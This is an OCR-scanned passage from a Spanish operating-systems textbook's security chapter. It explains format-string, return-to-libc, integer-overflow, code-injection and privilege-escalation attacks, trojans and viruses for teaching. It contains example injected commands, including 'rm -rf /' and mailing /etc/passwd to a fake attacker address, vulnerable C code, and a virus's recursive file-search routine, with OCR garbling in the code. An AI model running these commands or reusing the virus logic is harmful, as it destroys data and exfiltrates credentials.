incluir esta característica en printf? Definitivamente no, pero parecía muy útil en ese entonces. M u- 
chas vulnerabilidades en el software empezaron de esta forma. 

Como vimos en el ejemplo anterior, el programador que modificó el código permitió por acci¬ 
dente que el usuario del programa introdujera (sin saberlo) una cadena de formato. Como al impri¬ 
mir una cadena deformato se puedellegar a sobrescribir la memoria, ahora tenemos las herramientas 
necesarias para sobrescribir la dirección de retorno de la función printf en la pila y saltar hacia cual¬ 
quier otra parte, por ejemplo a la cadena de formato que se acaba de introducir. A este método se le 
conoce como ataque mediante cadenas de formato. 

U na vez que el usuario tenga la habilidad de sobrescribir la memoria y forzar un salto a un 
código recién inyectado, el código tiene todo el poder y acceso del programa al que está atacan¬ 
do. Si el programa tiene SETUID root, el atacante puede crear un shell con privilegios de usua¬ 
rio raíz (root). Los detalles para que funcione este ataque son algo complicados y especializados 
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como para reproducirlos aquí, pero basta con decir que este ataque es un problema grave. Si us¬ 
ted escribe "ataque de cadena de formato" en Google, encontrará mucha información sobre el 
problema. 

Como información adicional, el uso de arreglos de caracteres de tamaño fijo en este ejemplo 
también podría estar sujeto a un ataque de desbordamiento del búfer. 


9.6.3 Ataques de retorno a libe 

Tanto el ataque de desbordamiento del búfer como aquél mediante cadenas de formato requieren 
que se proporcionen datos a la pila, para después hacer que la función actual vuelva a estos datos 
en vez de regresar al método que hizo la llamada. Una forma de combatir estos ataques es marcar 
las páginas de la pila como de lectura/escritura, pero no de ejecución. Las CPUs Pentium modernas 
pueden hacer esto, aunque la mayoría de los sistemas operativos no aprovechan esta posibilidad. 
Pero hay otro ataque que funciona aún si los programas en la pila no se pueden ejecutar. A esto se 
le conoce como ataque de retorno a libe. 

Suponga que un ataque por desbordamiento del búfer o por cadenas de formato sobrescribe la 
dirección de retorno de la función actual, pero no puede ejecutar el código suministrado por el ata¬ 
cante que se encuentra en la pila. ¿Hay alguna otra partea la que pudiera regresar para poder com¬ 
prometer la máquina? Sí: casi todos los programasen C están vinculados con la biblioteca libe (que 
por lo general es compartida), la cual contiene las funciones clave que la mayoría de los programas 
necesitan. Una de estas funciones es strepy, que copia una cadena de bytes arbitraria de cualquier 
dirección a cualquier otra dirección. La naturaleza de este ataque es engañar a strepy para que co¬ 
pie el programa del atacante (que a menudo se conoce como shellcode o código de shell) al seg¬ 
mento de datos y lo ejecute desde ahí. 

Ahora veamos los detalles técnicos sobre el funcionamiento de este ataque. En la figura 9.25(a) 
podemos ver la pila justo después de que el programa ha llamado a una función f. Vamos a suponer 
que este programa se está ejecutando con privilegios de superusuario (es decir, SETUID root) y tiene 
un error que se puede explotar, el cual permite al atacante llevar su código de shell a la memoria, 
como se ilustra en la figura 9-25(b). En esta figura se muestra en la parte superior de la pila, donde 
no se puede ejecutar. 

Además de llevar el código de shell a la pila, el ataque tiene que sobrescribir las cuatro letras 
sombreadas que se muestran en la figura 9-25(b). La palabra inferior era la dirección de retorno a 
main, pero ahora es la dirección de strepy, por lo que f irá "de vuelta" a strepy. En ese punto, el 
apuntador de la pila apuntará a una dirección de retorno extraña que la misma función strepy utili¬ 
zará cuando termine. Esta dirección indica el lugar donde se localizará el código. Las dos palabras 
superiores a la primera que mencionamos son las direcciones de origen y de destino para la copia. 
Cuando strepy termine, el código de shell estará en su nuevo hogar en el segmento de datos (ejecu¬ 
table) y strepy "regresará" a él. Si el código de shell se ejecuta con los poderes que tiene el progra¬ 
ma atacado, puede crear un shell para que el atacante lo use después, o puede iniciar una secuencia 
de comandos para monitorear cierto puerto IP y esperar los comandos entrantes. En ese punto, la 
máquina se ha convertido en un zombiey se puede utilizar para enviar spam o lanzar ataques de ne¬ 
gación del servicio para su maestro. 
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Figura 9-25. (a) La pila antes del ataque, (b) La pila después de que se ha sobrescrito. 


9.6.4 Ataques por desbordamiento de enteros 

Las computadoras realizan aritmética de enteros en números de longitud fija, por lo general de 8, 
16, 32 o 64 bits. Si la suma de dos números que se van a sumar o multiplicar excede al máximo en¬ 
tero que se puede representar, se produce un desbordamiento. Los programas de C no atrapan este 
error; sólo almacenan y utilizan el valor incorrecto. En especial si las variables son enteros con sig¬ 
no, entonces el resultado de sumar o multiplicar dos enteros positivos se puede almacenar como un 
entero negativo. Si las variables no tienen signo, los resultados serán positivos pero tal vez haya 
acarreo cíclico. Por ejemplo, considere dos enteros de 16 bits sin signo, cada uno de los cuales con¬ 
tiene el valor 40,000. Si se multiplican en conjunto y el resultado se almacena en otro entero de 
16 bits sin signo, el producto aparente es 4096. 

Esta habilidad de producir desbordamientos numéricos indetectables se puede convertir en un 
ataque. Una manera de hacerlo es suministrara un programa dos parámetros válidos (pero grandes), 
a sabiendas de que se sumarán o multiplicarán y producirán un desbordamiento. Por ejemplo, algu¬ 
nos programas de gráficos tienen parámetros de línea de comandos que proporcionan la altura y la 
anchura de un archivo de imagen; por ejemplo, el tamaño al que se va a convertir una imagen de 
entrada. Si la anchura y la altura de destino se eligen de manera que se provoque un desbordamien¬ 
to forzoso, el programa calculará de manera incorrecta cuánta memoria necesita para almacenar la 
imagen y llamar a malloc para asignar un búfer demasiado pequeño para ella. La situación enton¬ 
ces es ideal para un ataque por desbordamiento del búfer. Es posible llevar a cabo explotaciones si¬ 
milares cuando la suma o el producto de dos enteros positivos con signo produce un entero 
negativo. 
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9.6.5 Ataques por inyección de código 

Este tipo de explotación implica hacer que el programa ejecute código sin darse cuenta de ello. Con¬ 
sidere un programa que en cierto punto necesita duplicar un archivo suministrado por el usuario ba¬ 
jo un nombre distinto (tal vez como respaldo). Si el programador es demasiado perezoso como para 
escribir el código, podría utilizar la función system, que crea una bifurcación del shell y ejecuta su 
argumento como un comando del shell. Por ejemplo, el código de C 

system(“ls >lista-archivos”) 

crea una bifurcación de un shell que ejecuta el comando 

Is >lista-archivos 

el cual lista todos los archivos en el directorio actual y los escribe en un archivo llamado lista-ar¬ 
chivos. El código que el programador haragán podría utilizar para duplicar el archivo se muestra en 
la figura 9-26. 


int main{¡nt argc, char *argv[]) 

{ 

char org[100], dst[100], cmd[205] = “cp 

pr¡ntf(“Escriba el nombre del archivo de origen: 

gets(org); 

strcat(cmd, ser); 

strcat(cmd, 

prlntf(“Escrlba el nombre del archivo de destino 

gets{dst); 

strcat(cmd, dst); 

system(cmd); 

} 


/* declara 3 cadenas 7 
”); /* pide el archivo de origen 7 

/* obtiene la entrada del teclado 7 
/* concatena src después de cp 7 
/* agrega un espacio al final de cmd 7 
: ”); /* pide el nombre del archivo de salida 7 

/* obtiene la entrada del teclado 7 
/* completa la cadena de comandos 7 
/* ejecuta el comando cp 7 


Figura 9-26. Código que podría provocar un ataque por inyección de código. 


Lo que hace ei programa es pedir ios nombres de ios archivos de origen y de destino, crea una 
iínea de comandos mediante ei uso de cp y después iiama a system para que ia ejecute. Si ei usua¬ 
rio escribe "abe" y "xyz" respectivamente, ei comando que se ejecuta es 

cp abe xyz 

ei cuai, en definitiva, copia ei archivo. 

Por desgracia, este código abre un enorme agujero de seguridad en ei que se utiiiza una técni¬ 
ca conocida como inyección de código. Suponga que ei usuario escribe "abe" y "xyz; rm -rf /" en 
vez de io anterior. A hora, ei comando que se construye y se ejecuta es 

cp abe xyz; rm -rf / 

este comando primero copia ei archivo y después trata deeiiminar de manera recursiva cada archi¬ 
vo y directorio en todo ei sistema de archivos. Si ei programa se ejecuta como superusuario, tiene 
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muchas probabilidades de lograrlo. Desde luego, el problema es que todo lo que hay después del 
punto y coma se ejecuta como un comando de shell. 

Otro ejemplo del segundo argumento podría ser "xyz; mail husmeador@tipos-malos.com 
</etc/passwd", lo cual produce 

cp abe xyz; mail husmeador@tipos-malos.com </etc/passwd 
con lo cual se envía el archivo de contraseñas a una dirección desconocida y nada confiable. 

9.6.6 Ataques por escalada de privilegios 

En el ataquepor escalada de privilegios el atacante engaña al sistema para que le proporcione más 
permisos de acceso de los que tiene. Por lo general lo engaña para que haga algo que sólo el super- 
usuario puede hacer. Un famoso ejemplo es de un programa que utilizó el demonio cron, 
el cual permite a los usuarios programar el trabajo que se va a realizar cada hora, cada día o cada 
semana, o con cualquier otra frecuencia. Comúnmente este demonio se ejecuta como root (o como 
algo casi igual de poderoso), por lo que puede acceder a los archivos desde cualquier cuenta de 
usuario. Tiene un directorio en el que almacena los comandos que están programados para ejecu¬ 
tarse. Por supuesto que los usuarios no pueden escribir en este directorio, ya que les daría la habi¬ 
lidad de hacer casi cualquier cosa. 

El ataque funcionaba de la siguiente manera. El programa del atacante establecía su directorio 
de trabajo en el directorio del demonio cron. Es obvio que no podría escribir ahí, pero eso no im¬ 
portó. Después fallaba de una manera que obligara a realizar un vaciado de núcleo, o dejaba que el 
sistema lo eliminara en cierta forma que se tuviera que realizar un vaciado de núcleo. Los vaciados 
de núcleo ocurren en el directorio en uso, que en este caso era el directorio del demonio cron. Co¬ 
mo el sistema es el que hace los vaciados, el sistema de protección no le prohibía escribir ahí. La 
imagen de memoria del programa atacante se estructuraba para que fuera un conjunto válido de co¬ 
mandos para el demonio cron, que después los ejecutaba como root. El primer comando cambiaba 
cierto programa especificado por el atacante a SETU ID root y el segundo ejecutaba este programa. 
En ese punto, el atacante tenía un programa arbitrario que se ejecutaba como superusuario. Este ho¬ 
yo específico ya se corrigió hace tiempo, pero nos da una idea sobre este tipo de ataque. 


9.7 MALWARE 

En los tiempos antiguos (por ejemplo, antes del 2000), los adolescentes aburridos (pero inteligen¬ 
tes) algunas veces utilizaban sus horas de ocio para escribir software malicioso que después libera¬ 
ban en el mundo, sólo por hacerlo. A este software (que incluía troyanos, virus y gusanos, y que en 
conjunto se le conoce como malware) se esparcía rápidamente en todo el mundo. A medida que se 
publicaba cuántos millones de dólares en daños había provocado el malware y cuántas personas ha¬ 
bían perdido sus valiosos datos como resultado, los autores se impresionaban mucho con sus habi¬ 
lidades de programación. Para ellos sólo era una travesura divertida: después de todo, no estaban 
obteniendo dinero de eso. 
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Esos días han desaparecido. A hora hay criminales bien organizados que escriben el malware 
bajo demanda y prefieren que su trabajo no se publique en los periódicos. Lo único que les inte¬ 
resa es el dinero. En la actualidad, una gran parte del malware está diseñada para esparcirse con la 
mayor rapidez posible a través de Internet, e infectar todas las máquinas que pueda. Cuando se in¬ 
fecta una máquina, se instala software que reporta la dirección de la máquina capturada de vuelta 
a ciertas máquinas, a menudo en países con sistemas judie! al es mal desarrollados o corruptos: por 
ejemplo, en algunas de las anteriores repúblicas soviéticas. También se instala una puerta trase¬ 
ra en la máquina, que permite a los criminales que enviaron el malware controlar con facilidad la 
máquina para que haga lo que le indiquen. U na máquina que se controla de esta forma se denomi¬ 
na zombie, y una colección de estas máquinas se conoce como botnet, una contracción de "robot 
network" (red de robots). 

Un criminal que controla una botnet la puede rentar para varios fines nefastos (y siempre co¬ 
merciales). Uno de los propósitos comunes es enviar spam comercial. Si ocurre un ataque serio de 
spam y la policía trata de rastrear el origen, todo lo que ven es que proviene de miles de máquinas 
de todo el mundo. Si logran ubicar algunos de los propietarios de estas máquinas, descubrirán que 
son niños, propietarios de negocios pequeños, amas de casa, abuelas y muchas otras personas, to¬ 
das las cuales niegan rotundamente que sean spammers masivos. Cuando los criminales detrás de 
la operación utilizan las máquinas de otras personas para que realicen el trabajo sucio, es difícil ras¬ 
trearlos. 

Una vez instalado, el malware también se puede utilizar para otros fines criminales. El chanta¬ 
je es una posibilidad. Imagine una pieza de malware que cifre todos los archivos en el disco duro 
de la víctima y después muestre el siguiente mensaje: 

¡SALUDOS DEL GENERAL CIFRADO! 

PARA COMPRAR UNA CLAVE DE DESCIFRADO PARA SU DISCO DURO, POR FAVOR 
ENVÍE $100 EN BILLETES PEOUEÑOS Y DESMARCADOS A LA DIRECCIÓN BOX 
2154, CIUDAD DE PANAMÁ, PANAMÁ. GRACIAS. ES UN GUSTO HACER NEGOCIOS 
CON USTED. 

Otra de las aplicaciones comunes del malware es instalar un keyiogger en la máquina infectada. Es¬ 
te programa simplemente registra todas las pulsaciones de tecla y las envía en forma periódica a al¬ 
guna máquina o secuencia de máquinas (incluyendo zombies) para que entreguen esta información 
al cri mi nal. A menudo es difíci I hacer que el proveedor de I nternet que da servicio a Ia máquina que 
hace las entregas coopere en una investigación, ya que muchos de estos proveedores están confa¬ 
bulados con el criminal (o, en algunas ocasiones, es el propietario). 

El oro a extraer en estas pulsaciones de teclas consiste en los números de tarjetas de crédito, 
que se pueden utilizar para comprar artículos. Como las víctimas no tienen idea de que alguien ha 
robado sus números de tarjetas de crédito hasta que reciben los estados de cuenta al final del ciclo 
de cobro, los criminales pueden andar de compras por días, o incluso por semanas. 

Para protegerse contra estos ataques, las empresas de tarjetas de crédito utilizan software de in¬ 
teligencia artificial para detectar ciertos patrones peculiares de gastos. Por ejemplo, si una persona 
que comúnmente utiliza su tarjeta de crédito sólo en las tiendas locales, de manera repentina orde¬ 
na una docena de computadoras notebook costosas para que las entreguen en una dirección, por 
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ejemplo en Tajikistan, empieza a sonar una alarma en la empresa de tarjetas de crédito y por lo 
general un empleado llama al tarjetahabiente para preguntarle amablemente sobre la transacción. 
Desde luego que los criminales conocen este software, así que tratan de ajustar sus hábitos de gas¬ 
to para permanecer (justo) debajo del radar. 

Los datos recolectados por el keyiogger se pueden combinar con otros datos recolectados por el 
software instalado en la computadora zombie, con lo cual el criminal se puede enfrascar en un robo 
de identidad más extenso. En este crimen, el criminal recolecta suficientes datos sobre una persona, 
como la fecha de nacimiento, el apellido de soltera de la madre, el número de seguro social, los nú¬ 
meros de cuentas bancadas, contraseñas, etcétera, para poder hacerse pasar por la víctima con éxito 
y obtener nuevos documentos físicos, como una licencia de conducir de reemplazo, una tarjeta de dé¬ 
bito adicional del banco, un certificado de nacimiento, y mucho más. A su vez, estos datos se pue¬ 
den vender a otros criminales para que los sigan explotando. 

Otra forma de delito que se comete mediante cierto malwarees permanecer invisible hasta que el 
usuario inicie sesión de manera correcta en su cuenta bancada de Internet. Después, ejecuta rápida¬ 
mente una transacción para ver cuánto dinero hay en la cuenta y lo transfiere de inmediato a la cuen¬ 
ta del criminal, desde donde se transfiere también de inmediato a otra cuenta, luego a otra y a otra 
(todo esto en distintos países corruptos), de manera que la policía necesite días o semanas para reco¬ 
lectar todas las órdenes de cateo requeridas para seguir el dinero, y que tal vez no se respeten aunque 
lleguen a obtenerlas. Este tipo de delitos implica un volumen de negocios importante: ya no se trata 
de adolescentes molestos. 

Además del uso que da el crimen organizado al malware, éste también tiene aplicaciones in¬ 
dustriales. Una empresa podría liberar una pieza de malware que compruebe si se está ejecutando 
en la fábrica de un competidor y no hay un administrador del sistema conectado en ese momento. 
Si no hay moros en la costa, puede interferir con el proceso de producción y reducir la calidad de 
los productos, con lo cual causaría problemas al competidor. En todos los demás casos no haría na¬ 
da, por lo cual sería difícil de detectar. 

Otro ejemplo de malware dirigido podría ser un programa escrito por un vicepresidente cor¬ 
porativo ambicioso, para liberarlo en la LAN local. El virus comprobaría si se está ejecutando en 
la máquina del presidente y, de ser así, buscaría una hoja de cálculo e intercambiaría dos celdas 
al azar. Tarde o temprano el presidente tomaría una mala decisión en base a la salida de la hoja 
de cálculo, lo cual podría provocar su despido y así el puesto estaría abierto para ya sabemos 
quién. 

Algunas personas caminan todo el día con un chip a cuestas (no hay que confundir esto con las 
personas que tienen un chip REID introducido en su espalda). Tienen cierta rencilla real o imagina¬ 
ria contra el mundo y desean desquitarse. El malware puede ayudar. M uchas computadoras moder¬ 
nas guardan el BIOS en la memoria flash, el cual se puede volver a escribir bajo el control de un 
programa (para permitir que el fabricante distribuya las correcciones a los errores por medios elec¬ 
trónicos). El malware puede escribir basura al azar en la memoria flash, para que la computadora 
ya no pueda arrancar. Si el chip de memoria flash está en un zócalo, para corregir el problema hay 
que abrir la computadora y reemplazar el chip. Si el chip de memoria flash está soldado a la tarje¬ 
ta principal, tal vez haya que desechar toda la tarjeta y comprar una nueva. 

Podríamos seguir de manera indefinida con esto, pero tal vez el lector ya haya comprendido el 
punto. Si desea más historias de horror, sólo escriba malware en cualquier motor de búsqueda. 


670 


SEGURIDAD 


CAPITULO 9 


Las personas podrían preguntar: "¿Por qué el malware se esparce con tanta facilidad?". Hay va¬ 
rias razones. En primer lugar, casi 90% de las computadoras en todo el mundo ejecutan (versiones de) 
un solo sistema operativo: Windows, que es un objetivo fácil. Si hubiera 10 sistemas operativos en 
uso, cada uno con 10% del mercado, sería mucho más difícil esparcir el malware. Al igual que 
en el mundo biológico, la diversidad es una buena defensa. 

En segundo lugar, desde sus primeros días M icrosoft ha puesto mucho énfasis en que las per¬ 
sonas sin conocimientos técnicos puedan utilizar Windows con facilidad. Por ejemplo, los sistemas 
Windows se configuran normalmente para permitir el inicio de sesión sin una contraseña, mientras 
que los sistemas UNIX siempre han requerido una contraseña (aunque esta excelente práctica se es¬ 
tá debilitando, a medida que Linux trata de parecerse cada vez más a Windows). Hay concesiones 
en muchas otras formas, entretener una buena seguridad o la facilidad de uso, y M icrosoft siempre 
ha optado por la facilidad de uso como estrategia de marketing. Si usted piensa que la seguridad es 
más importante que la facilidad de uso, deje de leer ahora y configure su teléfono celular para que 
requiera un código NIP cada vez que quiera hacer una llamada: casi todos los teléfonos celulares 
son capaces de ello. Si usted no sabe cómo, sólo descargue el manual de usuario del sitio Web del 
fabricante. ¿Recibió el mensaje? 

En las siguientes secciones analizaremos algunas de las formas más comunes de malware, la 
manera en que se construyen y cómo se esparcen. M ás adelante en el capítulo examinaremos algu¬ 
nas de las formas con las que nos podemos defender del malware. 


9.7.1 C aballos deTroya (troyanos) 

Escribir malware es una cosa; usted puede hacerlo en un rato libre. Hacer que millones de personas 
lo instalen en sus computadoras es algo muy difícil. ¿Cómo podría hacer esto M al, nuestro escritor 
de malware? Una práctica muy común es escribir cierto programa con una utilidad genuina e in¬ 
crustare! malware en su interior. Losjuegos, los reproductores de música, los visores porno "espe¬ 
ciales" y cualquier cosa con gráficos espectaculares es un probable candidato. Así, las personas 
descargarán e instalarán la aplicación de manera voluntaria. Como bono gratuito, también instalan 
el malware. A este método se le conoce como ataque de caballo deTroya o troyano en honor al ca¬ 
ballo de madera lleno de soldados griegos que se describe en la Odisea de Homero. En el mundo 
de la seguridad de computadoras, representa a cualquier tipo de malware oculto en el software o en 
una página Web, que las personas descargan en forma voluntaria. 

Cuando se inicia el programa gratuito, llama a una función que escribe el malware en el dis¬ 
co como un programa ejecutable y lo inicia. Después, el malware puede hacer todo el daño para 
el que fue diseñado, como eliminar, modificar o cifrar archivos. También puede buscar números 
de tarjetas de crédito, contraseñas y otros datos útiles, y enviarlos de vuelta a M al por medio de 
Internet. Lo más probable es que se adjunte a algún puerto IP y espere ahí las indicaciones, con¬ 
virtiendo la máquina en un zombie lista para enviar spam o cualquier cosa que su amo remoto de¬ 
see. Por lo general, el malware también invoca los comandos necesarios para asegurar que se 
reinicie cada vez que se reinicia la máquina. Todos los sistemas operativos tienen una manera de 
hacer esto. 
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La belleza del ataque del caballo deTroya es que no requiere que su autor irrumpa en ia compu¬ 
tadora de ia víctima. Es ia víctima quien hace todo ei trabajo. 

También hay otras formas de engañar a ia víctima para que ejecute ei programa dei cabaiio de 
Troya. Por ejempio, muchos usuarios de UNIX tienen una variabie de entorno iiamada $PATH, ia 
cuai controia en cuáies directorios se va a buscar un comando. Para veda se puede escribir ei si¬ 
guiente comando en ei sheii: 

echo $PATH 

Una configuración potenciai para ei usuario ast en cierto sistema podría consistir en ios siguientes 
directorios: 

:/usr/ast/bin:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11 :/usr/ucb:/usr/man\ 
:/usr/java/bin:/usr/java/lib:/usr/local/man:/usr/openwin/man 

Es probabie que otros usuarios tengan una ruta de búsqueda distinta. Cuando ei usuario escribe 

prog 

en ei sheii, éste comprueba primero para ver si hay un programa en ia ubicación /usr/ast/bin/prog. 
Si está ahí, se ejecuta. Si no está ahí, ei sheii prueba con /usr/iocai/bin/prog, /usr/bin/prog, /bin- 
/prog, y así en io sucesivo, probando ios 10 directorios en orden antes de rendirse. Suponga que só- 
io uno de estos directorios está desprotegido y que un cracker coiocó ahí un programa. Si ésta es ia 
primera ocurrencia dei programa en ia iista, se ejecutará y ei cabaiio deTroya también. 

La mayoría de ios programas están en /bin o /usr/bin, por io que no sirve de nada coiocar un 
cabaiio deTroya en /usr/bin/Xll/ls para un programa común, ya queei verdadero se encontrará 
primero. Sin embargo, suponga que ei cracker inserta ia en /usr/bin/Xll. Si un usuario escribe ia 
en vez de is (ei programa para iistar directorios), ahora se ejecutará ei cabaiio deTroya, reaiiza- 
rá su trabajo sucio y después emitirá ei mensaje correcto para indicar que ia no existe. Ai inser¬ 
tar cabaiios deTroya en directorios compiicados en ios que casi nadie busca y daries nombres 
que podrían representar errores comunes de escritura, hay una buena probabiiidad de que aiguien 
invoque uno de eiios tarde o temprano. Y ese aiguien podría ser ei superusuario (hasta eiios co¬ 
meten errores de escritura), en cuyo caso ei cabaiio de Troya ahora tendría ia oportunidad de 
reempiazar /bin/is con una versión que contenga un cabaiio deTroya, por io que ahora se invo¬ 
cará todo ei tiempo. 

Nuestro maiicioso pero váiido usuario iiamado M ai también podría dejar una trampa para ei 
superusuario de ia siguiente manera. M ai coioca una versión de is que contenga un cabaiio deTro¬ 
ya en su propio directorio y después hace aigo sospechoso, que con seguridad atraerá ia atención 
dei superusuario, como iniciar 100 procesos vincuiados con cáicuios ai mismo tiempo. Es probabie 
que para comprobar esa acción, ei superusuario escriba 

cd /home/mal 
Is -I 
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para ver qué tiene M al en su directorio de inicio. Como algunos shells primero prueban el directo¬ 
rio local antes de buscar en $PATH, tal vez el usuario haya invocado el caballo deTroya deM al con 
poder de superusuario. Así, el caballo deTroya podría hacer la operación /home/mal/bin/bin/sh 
SETUID root para establecerse en la raíz. Sólo se requieren dos llamadas al sistema: chmoci para 
cambiar el propietario de/home/mal/bin/sh a root y chmod para activar su bit SETUID. Ahora M al 
se puede convertir en superusuario cuando quiera, con sólo ejecutar ese shell. 

Si M al se queda corto de efectivo con frecuencia, podría utilizar una de las siguientes estafas 
con caballos deTroya para obtener más liquidez. En la primera estafa, el caballo deTroya comprue¬ 
ba para ver si la víctima tiene instalado un programa bancario en línea, como Quicken. De ser así, 
el caballo de Troya indica al programa que transfiera cierta cantidad de dinero de la cuenta de la 
víctima a una cuenta señuelo (de preferencia en un país muy lejano) para recolectar efectivo poste¬ 
riormente. 

En la segunda estafa, el caballo deTroya primero desactiva el sonido del módem y después 
marca un número 900 (de paga), otra vez de preferencia en un país muy lejano, como M oidova (par¬ 
te de la anterior Unión Soviética). Si el usuario estaba en línea cuando se inició el caballo deTro¬ 
ya, entonces el número telefónico 900 en Moldova necesita ser un proveedor de Internet (muy 
costoso), de manera que el usuario no lo note y tal vez permanezca en línea durante horas. N inguna 
de estas técnicas es hipotética: ambas han ocurrido y se reportan en Denning (1999). En la última es¬ 
tafa se acumularon 800,000 minutos de tiempo de conexión a M oidova antes de que la Comisión 
Federal de Comercio de los EE.UU. pudiera desconectar la máquina y entablara una acción legal 
contra tres personas en Long Island. Final mente acordaron reembolsar $2.74 millones a 38,000 víc¬ 
timas. 


9.7.2 Virus 

Es difícil abrir un periódico en estos días sin leer algo acerca de otro virus o gusano de computado¬ 
ra que ataca las computadoras del mundo. Es evidente que son un gran problema de seguridad pa¬ 
ra individuos y empresas por igual. En esta sección examinaremos los virus; después veremos los 
gusanos. 

Tengo que decir que no estaba muy seguro de escribir esta sección con tanto detalle, mucho 
menos de dar malas ideas a algunas personas, pero los libros existentes proporcionan mucho más 
detalley hasta incluyen código real (por ejemplo, Ludwig, 1998). Además, Internet está llena de in¬ 
formación sobre virus, por lo que el genio ya salió de la botella. Aparte de eso, es difícil para las 
personas defenderse contra los virus si no saben cómo funcionan. Por último, circulan muchas ideas 
equivocadas sobre los virus que necesitan corregirse. 

De cualquier forma, ¿qué es un virus? Para resumir, un virus es un programa que se puede re¬ 
producir a sí mismo al adjuntar su código a otro programa, lo cual es similar a la forma en que se 
reproducen los virus biológicos. El virus también puede hacer otras cosas además de reproducirse 
a sí mismo. Los gusanos son como los virus, pero se duplican en forma automática. Esa diferencia 
no nos interesa aquí, por lo que por el momento utilizaremos el término "virus" para tratar con am¬ 
bos términos. En la sección 9.7.3 analizaremos los gusanos. 
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Cómo funcionan los virus 

A hora veamos qué tipos de virus hay y cómo funcionan. Ei escritor dei virus (iiamémosio Virgi- 
iio) probabiemente trabaja en ensambiador (o tai vez en C) para obtener un producto pequeño y 
eficiente. Después de escribir su virus, io inserta en un programa en su propia máquina, utiiizan- 
do una herramienta conocida como dropper. Luego, ese programa infectado se distribuye, tai vez 
pubiicándoio en una coiección de software gratuito en Internet. El programa podría ser un nuevo 
juego emocionante, una versión pirata de algún software comercial o cualquier otra cosa que 
se pueda considerar como deseable. Después las personas empiezan a descargar el programa in¬ 
fectado. 

Una vez instalado en la máquina de la víctima, el virus permanece dormido hasta que se ejecu¬ 
ta el programa infectado: ya iniciado, por lo general empieza por infectar a otros programas en la 
máquina y después ejecuta su carga útil. En muchos casos, la carga útil tal vez no haga nada sino 
hasta que haya pasado cierta fecha, para asegurarse que el virus se haya esparcido en muchas par¬ 
tes antes de que las personas empiecen a detectarlo. En la fecha elegida podría incluso enviar un 
mensaje político (por ejemplo, si se activa en el aniversario 100 o 500 de algún grave insulto para 
el grupo étnico del autor). 

En el siguiente análisis examinaremos siete tipos de virus con base en lo que se infecta. Éstos 
son virus de compañía, de programa ejecutable, residentes en memoria, del sector de arranque, de 
driver de dispositivo, de macro y de código fuente. Sin duda aparecerán nuevos tipos en el futuro. 


Virus de compañía 

Un virus de compañía en realidad no infecta a un programa, sino que se ejecuta cada vez que lo 
hace el programa. El concepto es más fácil de explicar con un ejemplo. En M S-DOS, cuando el 
usuario escribe 

prog 

el MS-DOS busca primero un programa llamado prog.com. Si no puede encontrar uno, busca un 
programa llamado prog.exe. En Windows, cuando el usuario hace clic en Inicio y después en Eje¬ 
cutar, ocurre lo mismo. H oy en día la mayoría de los programas son archivos .exe; los archivos .com 
son muy raros. 

Suponga que Virgilio sabe que muchas personas ejecutan prog.exe desde un indicador de M S- 
DOS o desde el comando Ejecutar en Windows. Así sólo tiene que liberar un virus llamado prog- 
.com, que se ejecute cada vez que alguien trate de ejecutar prog (a menos que escriba el nombre 
completo: prog.exe). Cuando prog.com termina su trabajo, sólo ejecuta prog.exe y el usuario no se 
da cuenta de ello. 

Un ataque más o menos relacionado utiliza el escritorio de Windows, el cual contiene accesos 
directos (vínculos simbólicos) a los programas. Un virus puede cambiar el destino de un acceso di¬ 
recto para que apunte al virus. Cuando el usuario hace doble clic en un icono, se ejecuta el virus. 
Cuando termina, el virus sólo ejecuta el programa de destino original. 
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Virus de programa ejecutable 

Los virus que infectan programas ejecutabies son más compiejos que ios de compañía. Ei tipo más 
simpie de virus de programa ejecutabie sóio sobrescribe ai programa. A éstos se Íes conoce como 
virus de sobrescritura. La figura 9-27 proporciona ia iógica de infección de dicho virus. 


#include <sys/types.h> 
#include <sys/stat.h> 
#include <dirent.h> 
#include <fcntl.h> 
#include <un¡std.h> 
struct stat buf 


/* encabezados POSIX estándar 7 


/* para llamar a Istat y ver si el archivo es un vínculo simbólico 7 


buscar(char *nombre_dir) 

{ 

DIR *d¡rp; 
struct dirent *dp; 


/* búsqueda recursiva de ejecutables 7 
/* apuntador a un flujo de directorio abierto 7 
/* apuntador a una entrada de directorio 7 


} 


dirp = opendir(nombre_dir); 
if (dirp == NULL) return; 
while(TRUE) { 
dp = readdir(dirp); 
if (dp == NULL) { 
chdir(“..”); 
break; 


/* abre este directorio */ 

/* no se pudo abrir el directorio 7 

/* lee la siguiente entrada de directorio; olvidarlo 7 
/* NULL significa que ya terminamos 7 
/* regresa al directorio padre 7 
/* sale del ciclo 7 


} 

if (dp->d_name[0]==’.’) continué; /* omite los directorios . y .. 7 
lstat{dp->d_name,&sbuf); /* ¿es la entrada un vínculo simbólico? 7 

if (S_ISLNK(sbuf.st_mode)) continué; /* omite los vínculos simbólicos 7 
if (chdir(dp->d_name)==0){ / si chdir tiene éxito, debe ser un dir 7 

buscar(“.”); /* sí, entra y busca en el 7 

} else { /* no (archivo), lo infecta 7 

if(access(dp->d_name,X_OK)==0) /* si es ejecutable, lo infecta 7 
¡nfectar(dp-d_name); 

} 

closedir(dirp); /* se procesó el directorio, lo cierra y regresa 7 


Figura 9-27. Un procedimiento recursivo que busca archivos ejecutables en un siste¬ 
ma UNIX. 


El programa principal de este virus primero copia su programa binario en un arreglo, para lo 
cual abreargvjO] y lee su contenido para guardarlo en un lugar seguro. Después recorre todo el sis¬ 
tema de archivos, empezando en el directorio raíz, para lo cual se cambia al directorio raíz y llama 
a buscar con el directorio raíz como parámetro. 
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Para procesar un directorio, ei procedimiento recursivo buscar io abrey después iee ias entradas una 
a ia vez, utiiizando readdir hasta que se devueiva NUIL, io cuai indica que ya no hay más entradas. Si 
ia entrada es un directorio hay que procesado, para io cuai se cambia a este directorio y iiama a buscar 
en forma recursiva: si es un archivo ejecutabie, se infecta iiamando a infectar con ei nombre ei archivo 
a infectar como parámetro. Los archivos que empiezan con se omiten para evitar probiemas con ios 
directorios. y.., que son especiaies. También se omiten ios víncuiossimbóiicos debido a queei progra¬ 
ma asume que puede entrar a un directorio mediante ei uso de ia iiamada ai sistema chuir y después re¬ 
gresar a donde se encontraba mediante ei uso de.., aigo que es váiido para ios víncuios duros, pero no 
para ios simbóiicos. Un programa más eiegante podría manejar también víncuios simbóiicos. 

Ei verdadero procedimiento de infección iiamado infecta (que no se muestra) simpiemente tie¬ 
ne que abrir ei archivo cuyo nombre está en su parámetro, copiar ei virus guardado en ei arregio so¬ 
bre ei archivo y después cerrar ei archivo. 

Este virus se podría "mejorar" de varias formas. En primer iugar, se podría insertar una prue¬ 
